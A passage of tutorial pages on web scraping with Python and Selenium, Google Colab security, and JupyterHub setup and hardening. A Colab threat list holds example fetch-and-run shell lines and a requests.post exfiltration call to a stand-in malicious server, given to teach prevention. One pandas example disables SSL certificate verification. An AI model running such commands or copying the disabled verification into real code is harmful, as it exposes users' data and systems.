Category: Data Security

  • Data Scraping

    Data Scraping

    Data scraping is the process of extracting information from a target source and saving it into a file for further use. This target could be a website, an application, or any digital platform containing structured or unstructured data. The main goal of data scraping is to collect large amounts of data efficiently without manual copying, making it easier for organizations or individuals to gather the information they need for analysis or reporting.

    The process often involves using automated tools or scripts, such as web crawlers, bots, or specialized scraping frameworks. These tools navigate the target source, locate the desired data, and extract it in a structured format such as CSV, JSON, or Excel. Depending on the source, data scraping may require overcoming challenges such as dynamic content, login requirements, or anti-bot measures. It is a technical process that requires careful handling to ensure accuracy and efficiency.
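    As a sketch of the "structured format" step, the snippet below saves a handful of made-up scraped records to CSV and JSON using only Python's standard library (the records and file names are illustrative, not taken from a real scrape):

```python
import csv
import json

# Hypothetical records scraped from a product page (made-up data for illustration)
records = [
    {"name": "Widget A", "price": 19.99, "rating": 4.5},
    {"name": "Widget B", "price": 24.99, "rating": 4.1},
]

# Save as CSV: one header row, then one row per record
with open("products.csv", "w", newline="") as f:
    writer = csv.DictWriter(f, fieldnames=["name", "price", "rating"])
    writer.writeheader()
    writer.writerows(records)

# Save as JSON: the whole list as a single document
with open("products.json", "w") as f:
    json.dump(records, f, indent=2)
```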

    While data scraping focuses on data collection, the extracted information is often analyzed in a subsequent process called data mining. For example, a web crawler may scrape product details, prices, and reviews from e-commerce websites, and the collected data can then be analyzed to identify trends, patterns, or insights. By separating extraction from analysis, organizations can efficiently manage raw data and transform it into actionable intelligence, making data scraping a crucial first step in many data-driven workflows.


    Web Scraping

    Web Scraping is the automated process of extracting data from websites by using software tools or scripts to collect information directly from web pages. Websites can contain either static content, which is fixed in the page’s HTML and generally easier to scrape, or dynamic content, which is generated using JavaScript and may require more advanced tools or browser automation to access. Web scraping is commonly used for data collection, research, price monitoring, market analysis, and cybersecurity investigations. However, it is important to follow ethical and legal guidelines when scraping data, including reviewing the website’s terms of service and robots.txt file to ensure that scraping is permitted, as unauthorized data extraction may violate policies or laws.
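    Checking robots.txt can be automated with Python's standard-library urllib.robotparser. The robots.txt content below is supplied inline as a made-up example so the sketch needs no network access; a real scraper would fetch it from the target site:

```python
from urllib.robotparser import RobotFileParser

# A sample robots.txt, supplied inline so no network request is needed;
# a real scraper would fetch it from e.g. https://example.com/robots.txt
robots_txt = """\
User-agent: *
Disallow: /private/
Allow: /
"""

parser = RobotFileParser()
parser.parse(robots_txt.splitlines())

# Check whether a given user agent may fetch specific paths
print(parser.can_fetch("MyScraper", "https://example.com/public-page"))
print(parser.can_fetch("MyScraper", "https://example.com/private/data"))
```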


    Manual Web Scraping

    The process of extracting data from webpages without using any scraping tools or features is convenient for very small amounts of content, but it becomes impractical when the data is large or must be scraped frequently. One of the great benefits of manual scraping is human review: every data point is checked by the person who scrapes it.


    Manual Web Scraping (Example #1)

    Getting all the URLs from a wiki page (the output below is from the Wikipedia article on Malware)

    Right-click the page and choose View Page Source

    Search the page for href HTML attributes (this attribute defines a hyperlink), click Highlight All, and copy them one by one. Because this takes a very long time, a faster approach is to paste the page source into a text editor and extract the links with a regex such as href=["'](?<link>.*?)['"] or (?<=href=")[^"]*

    Save them into a file

    href="/w/load.php?lang=en&amp;modules=codex-search-styles%7Cext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector-2022"
    href="/w/load.php?lang=en&amp;modules=ext.gadget.SubtleUpdatemarker%2CWatchlistGreenIndicators&amp;only=styles&amp;skin=vector-2022"
    href="/w/load.php?lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector-2022"
    href="//upload.wikimedia.org"
    href="//en.m.wikipedia.org/wiki/Malware"
    href="/w/index.php?title=Malware&amp;action=edit"
    href="/static/apple-touch/wikipedia.png"
    href="/static/favicon/wikipedia.ico"
    href="/w/opensearch_desc.php"
    href="//en.wikipedia.org/w/api.php?action=rsd"
    href="https://en.wikipedia.org/wiki/Malware"
    href="https://creativecommons.org/licenses/by-sa/4.0/deed.en"
    href="/w/index.php?title=Special:RecentChanges&amp;feed=atom"
    href="//meta.wikimedia.org"
    href="//login.wikimedia.org"
    ...
    ...
    ...
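    The regex step above can be sketched in Python; the HTML snippet here is a made-up stand-in for the page source you would paste from the browser:

```python
import re

# Stand-in for page source pasted from the browser (not the real wiki page)
html = '''
<a href="/wiki/Malware">Malware</a>
<link href="/static/favicon/wikipedia.ico" rel="icon">
<a href='https://en.wikipedia.org/wiki/Computer_virus'>Virus</a>
'''

# Same idea as the regex in the steps above: capture whatever sits
# between the quotes that follow href=
links = re.findall(r'href=["\'](.*?)["\']', html)
for link in links:
    print(link)

# Save them into a file, one URL per line
with open("urls.txt", "w") as f:
    f.write("\n".join(links))
```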

    Automated Web Scraping

    This is done by utilizing tools that fetch the content and save it into files. Python is heavily used for web scraping; modules such as beautifulsoup4 and pandas support both scraping and mining.


    Automated Web Scraping (Example #1)

    The beautifulsoup module is well suited for extracting all the URLs from a webpage. This method of scraping is limited: it works well with static content, but it cannot retrieve dynamic content or take a screenshot of the website.

    Install beautifulsoup4 and lxml using the pip command

    from bs4 import BeautifulSoup # Import BeautifulSoup for HTML parsing
    from requests import get # Import get() to send HTTP requests
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"} # Mimic a real browser
    response = get("https://en.wikipedia.org/wiki/Malware", headers=headers) # Send GET request with the defined headers
    print(response.status_code) # Print HTTP status code (200 = OK)
    soup = BeautifulSoup(response.text, 'html.parser') # Parse HTML content
    for item in soup.find_all(href=True): # Loop through all tags containing an href attribute
        print(item['href']) # Print the link URL

    Output

    href="/w/load.php?lang=en&amp;modules=codex-search-styles%7Cext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector-2022"
    href="/w/load.php?lang=en&amp;modules=ext.gadget.SubtleUpdatemarker%2CWatchlistGreenIndicators&amp;only=styles&amp;skin=vector-2022"
    href="/w/load.php?lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector-2022"
    href="//upload.wikimedia.org"
    href="//en.m.wikipedia.org/wiki/Malware"
    href="/w/index.php?title=Malware&amp;action=edit"
    href="/static/apple-touch/wikipedia.png"
    href="/static/favicon/wikipedia.ico"
    href="/w/opensearch_desc.php"
    href="//en.wikipedia.org/w/api.php?action=rsd"
    href="https://en.wikipedia.org/wiki/Malware"
    href="https://creativecommons.org/licenses/by-sa/4.0/deed.en"
    href="/w/index.php?title=Special:RecentChanges&amp;feed=atom"
    href="//meta.wikimedia.org"
    href="//login.wikimedia.org"
    ...
    ...
    ...
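    Many of the scraped href values above are relative ("/static/...") or protocol-relative ("//upload.wikimedia.org"). A hypothetical post-processing step can resolve them into absolute URLs with the standard-library urljoin:

```python
from urllib.parse import urljoin

base = "https://en.wikipedia.org/wiki/Malware"

# A few href values like those in the output above
hrefs = [
    "/static/favicon/wikipedia.ico",  # relative to the site root
    "//upload.wikimedia.org",         # protocol-relative
    "https://creativecommons.org/licenses/by-sa/4.0/deed.en",  # already absolute
]

for href in hrefs:
    print(urljoin(base, href))  # Resolve each href against the page URL
```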

    Automated Web Scraping (Example #2)

    The pandas module is good for extracting all the tables within a page. Like the previous example, this method of scraping is limited: it works well with static content, but it cannot retrieve dynamic content or take a screenshot of the website.

    Install pandas and lxml using the pip command

    # bash /Applications/Python*/Install\ Certificates.command # macOS command to install SSL certificates if needed
    import pandas as pd # Import pandas for data handling and HTML table parsing
    import ssl # Import SSL module to handle HTTPS settings
    ssl._create_default_https_context = ssl._create_unverified_context # Disable SSL certificate verification (useful when encountering certificate errors)
    tables = pd.read_html("https://en.wikipedia.org/wiki/Comparison_of_computer_viruses") # Read all HTML tables from the given URL into a list of DataFrames
    for i, table in enumerate(tables): # Loop through each table with its index
        print("Table %s\n" % i, table.head()) # Print table index and first 5 rows

    Output

    Table 0
         0                                                  1
    0 NaN  This article has multiple issues. Please help ...
    1 NaN  This article needs to be updated. Please help ...
    2 NaN  This article needs additional citations for ve...
    Table 1
         0                                                  1
    0 NaN  This article needs to be updated. Please help ...
    Table 2
         0                                                  1
    0 NaN  This article needs additional citations for ve...
    Table 3
          Virus  ...                                              Notes
    0     1260  ...   First virus family to use polymorphic encryption
    1       4K  ...  The first known MS-DOS-file-infector to use st...
    2      5lo  ...                            Infects .EXE files only
    3  Abraxas  ...  Infects COM file. Disk directory listing will ...
    4     Acid  ...  Infects COM file. Disk directory listing will ...

    [5 rows x 9 columns]
    Table 4
          vteMalware topics                                vteMalware topics.1
    0   Infectious malware  Comparison of computer viruses Computer virus ...
    1          Concealment  Backdoor Clickjacking Man-in-the-browser Man-i...
    2   Malware for profit  Adware Botnet Crimeware Fleeceware Form grabbi...
    3  By operating system  Android malware Classic Mac OS viruses iOS mal...
    4           Protection  Anti-keylogger Antivirus software Browser secu...
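    pd.read_html also accepts literal HTML wrapped in a file-like object, which is handy for experimenting without a network request. This sketch assumes pandas and lxml are installed (as in the install step above); the table content is made up:

```python
from io import StringIO

import pandas as pd

# A minimal HTML table, supplied inline instead of a live URL (made-up rows)
html = StringIO("""
<table>
  <tr><th>Virus</th><th>Year</th></tr>
  <tr><td>1260</td><td>1990</td></tr>
  <tr><td>Abraxas</td><td>1993</td></tr>
</table>
""")

tables = pd.read_html(html)  # Returns a list of DataFrames, one per <table>
print(tables[0])
```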

    Automated Web Scraping (Example #3)

    One of the best web scraping techniques is using a headless browser: a browser that runs without a graphical user interface (GUI). Headless browsers were originally used for automated quality assurance tests but have more recently been used for scraping. The two main benefits of a headless browser are rendering dynamic content and behaving like a human browsing a website.

    The following scripts will not run on Google Colab

    Scrape using Firefox (with geckodriver setup)

    1. Install the latest Firefox version
    2. Install selenium using the pip command
    3. Download the geckodriver from here (The Firefox application version has to match the webdriver version)
    4. Extract the geckodriver and note the location (E.g., /scrape/geckodriver)

    from selenium import webdriver # Import Selenium WebDriver
    options = webdriver.firefox.options.Options() # Create Firefox options object
    options.add_argument("--headless") # Run Firefox in headless mode (no GUI)
    service = webdriver.firefox.service.Service(r'path to the geckodriver') # Specify the local path to the geckodriver executable
    browser = webdriver.Firefox(options=options, service=service) # Launch Firefox with the specified options
    browser.get('https://www.google.com') # Open Google homepage
    # print(browser.find_element(By.XPATH, "/html/body").text) # (Optional) Print the full page text (requires: from selenium.webdriver.common.by import By)
    browser.save_screenshot("screenshot_using_firefox.png") # Save a screenshot of the loaded page
    browser.close() # Close the browser window
    browser.quit() # End the WebDriver session

    Scrape using Firefox (without geckodriver setup)

    1. Install the latest Firefox version
    2. Install selenium and webdriver-manager using the pip command

    from selenium import webdriver # Import Selenium WebDriver
    from webdriver_manager.firefox import GeckoDriverManager # Automatically download/manage GeckoDriver
    options = webdriver.firefox.options.Options() # Create Firefox options object
    options.add_argument("--headless") # Run Firefox in headless (no GUI) mode
    service = webdriver.firefox.service.Service(GeckoDriverManager().install()) # Set up the GeckoDriver service
    browser = webdriver.Firefox(options=options, service=service) # Launch Firefox with the specified options
    browser.get('https://www.google.com') # Open Google homepage
    # print(browser.find_element(By.XPATH, "/html/body").text) # (Optional) Print full page text (requires: from selenium.webdriver.common.by import By)
    browser.save_screenshot("screenshot_using_firefox.png") # Capture a screenshot of the page
    browser.close() # Close the browser window
    browser.quit() # End the WebDriver session

    Scrape using Chrome (with chromedriver setup)

    1. Install the latest Chrome version
    2. Install selenium using the pip command
    3. Download the ChromeDriver from here (The chrome web browser version has to match the webdriver version)
    4. Extract the ChromeDriver and note the location (E.g., /scrape/chromedriver)

    from selenium import webdriver # Import Selenium WebDriver
    options = webdriver.chrome.options.Options() # Create Chrome options object
    options.add_argument('--headless') # Run Chrome in headless (no GUI) mode
    options.add_argument('--no-sandbox') # Disable sandbox (required in containers/VMs)
    options.add_argument('--disable-dev-shm-usage') # Prevent shared memory issues
    service = webdriver.chrome.service.Service(r'path to the chromedriver') # Specify the local path to chromedriver
    browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with the specified options
    browser.get('https://www.google.com') # Open Google homepage
    browser.save_screenshot("screenshot_using_chrome.png") # Take a screenshot of the loaded page
    browser.close() # Close the browser window
    browser.quit() # End the WebDriver session

    Scrape using Chrome (without chromedriver setup)

    1. Install the latest Chrome version
    2. Install selenium and webdriver-manager using the pip command

    from selenium import webdriver # Import Selenium WebDriver
    from webdriver_manager.chrome import ChromeDriverManager # Automatically download/manage ChromeDriver
    options = webdriver.chrome.options.Options() # Create Chrome options object
    options.add_argument('--headless') # Run Chrome in headless (no GUI) mode
    options.add_argument('--no-sandbox') # Disable sandbox (required in some environments)
    options.add_argument('--disable-dev-shm-usage') # Avoid shared memory issues in containers
    service = webdriver.chrome.service.Service(ChromeDriverManager().install()) # Set up the ChromeDriver service
    browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with the specified options
    browser.get('https://www.google.com') # Open Google homepage
    browser.save_screenshot("screenshot_using_chrome.png") # Capture a screenshot of the page
    browser.close() # Close the browser window
    browser.quit() # End the WebDriver session

    Automated Web Scraping (Example #4 – Best Option)

    You can run this example in Google Colab

    Install latest chrome version

    !apt update # Update the package list from the repositories
    !apt install libu2f-udev libvulkan1 # Install dependencies required by Google Chrome
    !wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb # Download the Google Chrome .deb package
    !dpkg -i google-chrome-stable_current_amd64.deb # Install the Chrome package manually
    !apt --fix-broken install # Fix missing dependencies caused by the dpkg install
    !pip install selenium webdriver-manager # Install Selenium and the webdriver manager via pip

    Scrape the website

    from selenium import webdriver # Import Selenium WebDriver
    from webdriver_manager.chrome import ChromeDriverManager # Automatically manage ChromeDriver
    from selenium.webdriver.common.by import By # Import locator strategies (e.g., XPATH)
    options = webdriver.chrome.options.Options() # Create Chrome options object
    options.add_argument('--headless') # Run Chrome without a visible window
    options.add_argument('--no-sandbox') # Disable sandbox (needed in containers/Colab)
    options.add_argument('--disable-dev-shm-usage') # Prevent shared memory issues
    service = webdriver.chrome.service.Service(ChromeDriverManager().install()) # Install and configure the ChromeDriver service
    browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with the defined options
    browser.get('https://www.google.com') # Open Google homepage
    # print(browser.find_element(By.XPATH, "/html/body").text) # (Optional) Print page text using XPath
    browser.save_screenshot("screenshot_using_chrome.png") # Save a screenshot of the loaded page
    browser.close() # Close the browser window
    browser.quit() # End the WebDriver session

    If you want to wait until a website finishes loading, you can use the sleep function.

    from selenium import webdriver # Import Selenium WebDriver
    from webdriver_manager.chrome import ChromeDriverManager # Automatically manage ChromeDriver
    from selenium.webdriver.common.by import By # Import locator strategies (e.g., XPATH)
    from time import sleep # Import the sleep function
    options = webdriver.chrome.options.Options() # Create Chrome options object
    options.add_argument('--headless') # Run Chrome without a visible window
    options.add_argument('--no-sandbox') # Disable sandbox (needed in containers/Colab)
    options.add_argument('--disable-dev-shm-usage') # Prevent shared memory issues
    service = webdriver.chrome.service.Service(ChromeDriverManager().install()) # Install and configure the ChromeDriver service
    browser = webdriver.Chrome(options=options, service=service) # Launch Chrome with the defined options
    browser.get('https://us.shop.battle.net/en-us') # Open the Battle.net shop homepage
    sleep(10) # Wait 10 seconds for dynamic content to load
    # print(browser.find_element(By.XPATH, "/html/body").text) # (Optional) Print page text using XPath
    browser.save_screenshot("screenshot_using_chrome.png") # Save a screenshot of the loaded page
    browser.close() # Close the browser window
    browser.quit() # End the WebDriver session

    Anti Web Scraping

    Many websites do not allow web scraping; they implement anti-scraping methods to prevent users from scraping their content, which makes scaling that process a tough and tedious job. For example, if you run the following script every second, you will be blocked and shown a message telling you to slow down!

    Example

    import requests # HTTP client library
    import time # For pausing between requests
    while True: # Request the same resource repeatedly
        res = requests.get("https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/043/211/original/ip-filter.blf")
        print(res.text) # Print the response body
        time.sleep(1) # Wait one second between requests

    Output

    You have exceeded 5 requests to the blacklist in under one minute.  Please slow down.
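    A scraper can avoid triggering blocks like the one above by throttling itself and backing off exponentially after a rate-limit response. This is a sketch using a hypothetical fetch function injected as a parameter, so it runs without any real network traffic:

```python
import time

def fetch_with_backoff(fetch, max_retries=4, base_delay=1.0, sleep=time.sleep):
    """Call fetch() and retry with exponential backoff when it reports
    rate limiting. fetch() is any function returning (status_code, body)."""
    for attempt in range(max_retries):
        status, body = fetch()
        if status != 429:  # 429 = Too Many Requests
            return status, body
        sleep(base_delay * (2 ** attempt))  # Wait 1s, 2s, 4s, 8s, ...
    return status, body  # Give up after max_retries attempts

# Demo with a fake server that rate-limits the first two calls (made-up)
calls = {"n": 0}
def fake_fetch():
    calls["n"] += 1
    return (429, "slow down") if calls["n"] <= 2 else (200, "ok")

delays = []  # Record requested sleep durations instead of actually sleeping
status, body = fetch_with_backoff(fake_fetch, sleep=delays.append)
print(status, body, delays)  # 200 ok [1.0, 2.0]
```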

    Anti Web Scraping Techniques

    • Fingerprinting
      • Collecting information about the device using IP address, user agents, system resources, etc.
    • User Behavior Analysis
      • Analyze the user interaction with the resources and block them if they repeat the same pattern
    • Authentication
      • Add login walls to resources
    • Challenges
      • Add challenges like a captcha to reveal resources
    • Honeypots
      • Add honeypots that log users and direct them to different resources if they violate the scraping policy
    • Dynamic content
      • Switching from static content to dynamic content (The content changes dynamically during runtime)
    • Randomizing identifiers
      • This is part of dynamic content, the content generates random identifiers
    • Rate limits
      • Limit the number of requests per user
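    The rate-limit technique above can be sketched server-side as a sliding window, mirroring the "5 requests in under one minute" message from the earlier example. The client identifier and timestamps are made up, and the clock is injected so the demo is deterministic:

```python
from collections import defaultdict, deque

class RateLimiter:
    """Allow at most `limit` requests per `window` seconds for each client."""
    def __init__(self, limit=5, window=60.0):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)  # client id -> timestamps of recent requests

    def allow(self, client, now):
        q = self.hits[client]
        while q and now - q[0] >= self.window:  # Drop timestamps outside the window
            q.popleft()
        if len(q) < self.limit:
            q.append(now)
            return True
        return False  # Over the limit: tell the client to slow down

limiter = RateLimiter(limit=5, window=60.0)
for t in range(5):
    print(limiter.allow("203.0.113.7", now=float(t)))  # First five succeed
print(limiter.allow("203.0.113.7", now=5.0))   # Sixth within a minute: blocked
print(limiter.allow("203.0.113.7", now=61.0))  # After the window slides: allowed
```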
  • Google Colab

    Google Colab

    Google Colab (Colaboratory) is a cloud-based, hosted Jupyter Notebook environment provided by Google. It allows users to write and run Python code in a web browser without installing any software locally. Colab is particularly popular for data science, machine learning, and deep learning projects due to its easy access to computing resources, including CPUs, GPUs, and TPUs.

    Colab is available in two main tiers:

    • Free version: Designed primarily for learning, experimentation, and lightweight projects. Users get access to a basic virtual machine with limited RAM and CPU/GPU resources. Sessions in the free tier have time limits, and resources are allocated dynamically, so performance may vary.
    • Paid versions: Targeted at professional or heavy users who need more consistent performance. Paid subscriptions provide faster GPUs, larger RAM allocations, longer runtimes, and priority access to resources, making them suitable for more demanding tasks such as training large machine learning models.

    Key features of Google Colab include:

    • Interactive coding: Run code cells, visualize outputs, and modify computations in real-time.
    • Seamless integration with Google Drive: Save notebooks directly in Drive for easy access and sharing.
    • Pre-installed libraries: Popular Python libraries for data analysis, machine learning, and visualization (e.g., NumPy, pandas, Matplotlib, TensorFlow, PyTorch) are already installed.
    • Collaboration: Multiple users can work on the same notebook simultaneously, similar to Google Docs.
    • Hardware acceleration: Easily switch between CPU, GPU, and TPU for faster computations without complex setup.

    Overall, Google Colab provides a flexible, accessible, and collaborative environment for learning, experimentation, and professional projects, making advanced computational resources available to anyone with an internet connection.

    You can access the free tier of Google Colab by signing in with your Google account at the following link https://colab.research.google.com/drive/ 


    Colab Security

    The security of Google Colab is tied to your Google Account. For example, if you enable two-factor authentication and carefully manage sharing permissions, your notebooks and data remain protected. However, if your account is compromised or you share notebooks with broad access, others may be able to view or modify your work.

    Google Colab Cyberattacks

    • Phishing Attack
      • A threat actor sends a phishing email impersonating Google, prompting the recipient to log in to Colab via a fake link.
      • Impact:
        • If the person falls for it, the threat actor can access their Google Account
        • The Colab notebooks, Drive files, and connected data are exposed
      • Preventive Measures:
        • Verify URLs before logging in
        • Enable two-factor authentication (2FA)
        • Never enter credentials on suspicious sites
    • Credential Stuffing
      • A threat actor uses leaked passwords from other services to attempt to log into someone’s Google Account.
      • Impact:
        • If the password is reused, the threat actor gains access to Colab notebooks
        • They can view sensitive datasets, copy or delete notebooks, or run malicious code
      • Preventive Measures:
        • Use strong, unique passwords for Google Accounts
        • Enable 2FA
        • Regularly monitor login activity
    • Unauthorized Access via Over-Sharing
      • Someone shares a notebook as “Anyone with the link – Editor”, and a threat actor discovers the link.
      • Impact:
        • The threat actor can modify the notebook, insert malicious code, or exfiltrate data
        • Other users who run the notebook may unknowingly execute harmful commands
      • Preventive Measures:
        • Limit sharing to specific people
        • Use Viewer or Commenter access when editing isn’t needed
    • Malicious Code Injection
      • A threat actor provides a notebook containing malicious commands, which someone runs in Colab: !wget https://example.com/script.sh && bash script.sh or !curl -sL https://example.com/script.sh | bash
      • Impact:
        • The code could install malware or spyware
        • It might steal data from the mounted Google Drive
        • It could send sensitive data to external servers
      • Preventive Measures:
        • Review all code before executing
        • Avoid running untrusted notebooks, especially shell commands (!)
        • Mount the drive only when necessary
    • Data Exfiltration
      • A threat actor sneaks code into a shared notebook that uploads files from someone’s session to a remote server: requests.post("https://malicious-server.com/upload", files={"file": open("data.csv","rb")})
      • Impact:
        • Sensitive data, credentials, or IP information may be stolen
        • The person may not realize the data has been compromised until it’s too late
      • Preventive Measures:
        • Avoid running unknown scripts
        • Inspect network calls in notebooks
        • Clear outputs and restart the runtime before sharing
    • Ransomware-Style Attack
      • A threat actor sends a notebook that encrypts files in someone’s mounted Google Drive when executed.
      • Impact:
        • Access to the files is blocked until a ransom is paid
        • Data loss or corruption may occur
      • Preventive Measures:
        • Keep backups of important files
        • Avoid running notebooks from untrusted sources
        • Limit Colab access and Drive mounting to trusted notebooks only
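    The "review all code before executing" advice above can be partly automated. This sketch scans a notebook's JSON for a few suspicious patterns (shell escapes, pipe-to-shell, Drive mounting, outbound posts); the pattern list and sample notebook are made up, and this is a heuristic aid, not a substitute for reading the code:

```python
import json

# Patterns worth a manual look before running someone else's notebook (illustrative list)
SUSPICIOUS = ["!wget", "!curl", "| bash", "| sh", "drive.mount", "requests.post"]

def flag_cells(notebook_json):
    """Return (cell_index, matched_pattern) pairs for code cells that
    contain any of the suspicious patterns. A heuristic, not a sandbox."""
    findings = []
    for i, cell in enumerate(notebook_json.get("cells", [])):
        if cell.get("cell_type") != "code":
            continue
        source = "".join(cell.get("source", []))
        for pattern in SUSPICIOUS:
            if pattern in source:
                findings.append((i, pattern))
    return findings

# A made-up notebook with one benign cell and one malicious-looking cell
nb = {
    "cells": [
        {"cell_type": "code", "source": ["print('hello')\n"]},
        {"cell_type": "code", "source": ["!curl -sL https://example.com/script.sh | bash\n"]},
    ]
}
print(flag_cells(nb))  # [(1, '!curl'), (1, '| bash')]
```

    A real .ipynb file is JSON in this same shape, so the function can be pointed at json.load(open("notebook.ipynb")).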

    Create a Notebook

    After logging in, go to New Notebook or go to File, then New Notebook.


    Rename the Notebook

    You can rename the notebook by left-clicking its name.


    Execute Python Code

    In the top-left corner, the + Code button adds code cells to the interactive document. Code cells have a right-arrow (run) symbol. Type print("Hello world") and click on that arrow.

    Result


    Wrapping Output Text

    If you want the output text to be wrapped, execute the following as code in the first cell

    from IPython.display import HTML, display # Import HTML display tools; HTML() lets you write HTML/CSS and display() renders it in the notebook
    def css(): # Define a function that injects the CSS
        display(HTML('''<style>pre {white-space: pre-wrap;}</style>''')) # Make all <pre> blocks (cell output) wrap long lines instead of scrolling horizontally
    get_ipython().events.register('pre_run_cell', css) # Apply the CSS automatically before every cell runs

    Result


    Colab Virtual Instance IP

    Colab virtual instances (containers) are connected to the internet

    from requests import get # Import the get function from the requests library to make HTTP requests
    ip = get('https://api.ipify.org').content.decode('utf8') # Request api.ipify.org, which returns your public IP as plain text, and decode the response bytes into a string
    print("Public IP is: ", ip) # Print the public IP in a readable format

    Result


    Colab Processes

    You can get the current processes using the psutil module

    import psutil # Import the psutil library, used for system monitoring (CPU, memory, processes)
    for pid in psutil.pids(): # psutil.pids() returns a list of all running process IDs (PIDs)
        print(psutil.Process(pid).name()) # Print each process name

    Result


    Colab Extensions

    Colab extensions are extra tools or add-ons that enhance Google Colab’s functionality beyond its default features. They help you work faster, explore data better, and customize your notebook experience. google.colab.data_table is a module in Google Colab that displays pandas DataFrames as interactive tables inside a notebook. (Some Colab extensions are already loaded in the notebook.)

    %load_ext google.colab.data_table # Load the Colab extension that displays DataFrames as interactive tables

    import pandas as pd # Import pandas for data manipulation
    import numpy as np # Import numpy for numerical operations

    data = { # Create a dictionary with sample data
        'Name': ['John', 'Jane', 'Joe'], # List of names
        'Sales': [25, 30, 35], # List of corresponding sales numbers
        'City': ['New York', 'Los Angeles', 'Houston'] # List of corresponding cities
    }

    df = pd.DataFrame(data) # Convert the dictionary to a pandas DataFrame
    df.to_csv('dummy_data.csv', index=False) # Save the DataFrame to a CSV file without the index column
    df # Display the DataFrame in the notebook

    Result


    Colab Environment Variables

    To securely access saved secrets (like API keys) in Google Colab without putting them directly in your code, use google.colab.userdata. It helps protect sensitive information when sharing notebooks.

    Then, you will see the secret 
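
    To illustrate, here is a hedged sketch of reading a saved secret. The secret name MY_API_KEY is a placeholder; the environment-variable fallback exists only so the snippet also runs outside Colab, where google.colab is unavailable.

```python
import os

def get_secret(name):
    """Read a secret from Colab's secret store, falling back to environment variables."""
    try:
        from google.colab import userdata  # Only importable inside Colab
        return userdata.get(name)
    except ImportError:
        return os.environ.get(name)  # Fallback for non-Colab environments

# Never hard-code the key itself in the notebook
api_key = get_secret("MY_API_KEY")
```

    In Colab, you would first add MY_API_KEY under the key icon in the left sidebar and grant the notebook access to it.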

  • JupyterHub

    JupyterHub

    JupyterHub

    JupyterHub is an open-source platform that provides multi-user access to Jupyter Notebook or JupyterLab environments. While JupyterLab or the single-user Jupyter Notebook server is suitable for individual users, JupyterHub is ideal for educational institutions, research groups, or organizations that need multiple users to have their own interactive computing environments on a shared server. Each user gets a personal, isolated instance of a Jupyter Notebook or JupyterLab server, while administrators can centrally manage authentication, resource allocation, and access control.

    JupyterHub supports a variety of authentication methods, including OAuth, LDAP, GitHub, and custom systems, making it flexible for different organizational needs. It can be deployed on a single server or scaled across cloud infrastructure or high-performance computing clusters, allowing dozens or even hundreds of users to run notebooks simultaneously.

    Security is a critical concern for JupyterHub deployments. Because it exposes interactive coding environments over a network, improper configuration can allow threat actors to exploit vulnerabilities, gain unauthorized access, or use the server for malicious activities, such as launching attacks or mining cryptocurrencies. To mitigate risks, administrators should enforce strong authentication, HTTPS encryption, firewall rules, and regular updates.

    Key features of JupyterHub include:

    • Multi-user management: Centralized control over multiple notebook instances.
    • Customizable environments: Each user can have their own libraries and resources without affecting others.
    • Scalability: Can run on local servers, cloud platforms, or containerized systems like Docker or Kubernetes.
    • Integration with JupyterLab: Users can work in the modern JupyterLab interface while administrators manage the backend infrastructure.

    Overall, JupyterHub provides a secure, scalable, and collaborative platform for teams or classrooms that need interactive computing environments, but it requires careful setup to maintain security and reliability.

    Installing JupyterHub on Ubuntu Server 

    We will be installing JupyterHub in the Ubuntu Server VM. The installation process takes ~5-10 minutes to finish.

    1. Setup Ubuntu Server in a VM
    2. Go to the terminal and run
      1. sudo apt install python3 python3-dev git curl
      2. curl -L https://tljh.jupyter.org/bootstrap.py | sudo -E python3 - --admin admin
    3. Verify that JupyterHub is working by running sudo lsof -i :80 in the terminal
    4. Go to your web browser and type 127.0.0.1
    5. Enter admin as username and type any strong password you would like to use

    Hardening JupyterHub (Latest Software Version)

    We installed JupyterHub using the official bootstrap script, which pulls the latest version of JupyterHub and installs it for us. When installing software, always make sure it comes from a trusted source. If you install software manually, make sure to verify its integrity using checksums.

    Type server_ip/hub/admin in the web browser

    The software version matches the latest release listed on PyPI

    To update to the latest version, you can run this command in the terminal (Do not run this in JupyterHub)

    curl # Command-line tool used to download data from a URL
    -L # Tells curl to follow redirects (the URL may redirect to another location)
    https://tljh.jupyter.org/bootstrap.py # The URL of the bootstrap installer script for The Littlest JupyterHub (TLJH)
    | # Pipe; sends the downloaded script directly to another command instead of saving it to a file
    sudo # Runs the next command with administrator (root) privileges, required to install system services and packages
    python3 # Uses the system’s Python 3 interpreter to execute the script
    - # Tells Python to read the script from standard input (stdin), i.e., from the pipe
    --version=latest # Argument passed to bootstrap.py, instructing it to install the latest TLJH release

    (VM) $ curl -L https://tljh.jupyter.org/bootstrap.py | sudo python3 - --version=latest

    Hardening JupyterHub Server (Changing Default Credentials and Adding Regular Users)

    Type server_ip/hub/admin in the web browser. If you used default usernames and passwords, you can change them from here. Remember: default credentials are acceptable in testing environments, but never in production environments.

    Also, you can manage the users using tljh-config

    sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
    tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
    add-item # A subcommand that adds a value to a list-type configuration setting.
    users.admin # The configuration key that stores the list of JupyterHub admin users.
    <username> # The Linux/JupyterHub username you want to grant admin privileges to (replace this with the actual username).

    (VM) $ sudo tljh-config add-item users.admin <username>

    sudo # Runs the command with administrator (root) privileges, which are required to modify TLJH configuration.
    tljh-config # The configuration management tool for The Littlest JupyterHub (TLJH). It is used to view and change JupyterHub settings in a safe, structured way.
